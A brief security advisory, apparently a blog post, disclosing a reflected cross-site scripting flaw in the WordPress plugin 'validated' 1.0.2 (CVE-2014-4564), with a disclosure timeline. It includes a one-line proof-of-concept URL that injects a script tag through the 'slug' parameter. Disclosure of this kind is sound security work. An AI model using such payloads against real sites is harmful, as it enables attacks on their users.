wp-plugin : validated – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : validated

 

Effected Version : 1.0.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/validated/check.php?url=tester&id=1&slug=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-27

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4564

 
Plugin Description :
 
Make sure your entire site has valid code.

Leave a Reply

Your email address will not be published. Required fields are marked *